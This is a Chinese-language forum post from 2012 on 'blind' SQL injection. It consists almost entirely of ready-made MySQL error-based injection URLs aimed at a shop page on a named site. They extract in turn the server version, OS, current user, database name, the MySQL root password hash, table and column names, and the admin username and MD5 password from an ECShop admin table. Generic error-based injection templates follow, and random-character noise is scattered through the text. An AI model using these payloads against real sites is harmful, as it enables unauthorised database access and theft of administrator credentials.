
盲注详细内容

发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
7 ^6 @3 O2 r$ e4 {3 r; uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user()
# f# o1 ~/ V5 U4 \) A+ X5 _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
$ J9 t1 n2 r8 e# L4 @% Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash

) a' L: v+ c* y( R; K7 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名
  }7 U. ^1 S$ p8 R- }, X) i! L3 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& ~" r0 T# q$ c/ n" M0 [2 F/ g
当前 数据库 user_name 字段

. ~" B/ ~) h5 r5 j+ J+ A- m1 bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# O/ j- B' K4 w/ p1 P+ r4 V

获得 admin passwd(md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; a5 n9 s  K) L, ?
报错注射
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)7 ?" I; q8 c7 u0 x/ U' _

6 h0 X" O( e2 o" m" g0 g: q  DSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)1 q0 A+ N3 K5 F6 h

% S' P. r7 t& Tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)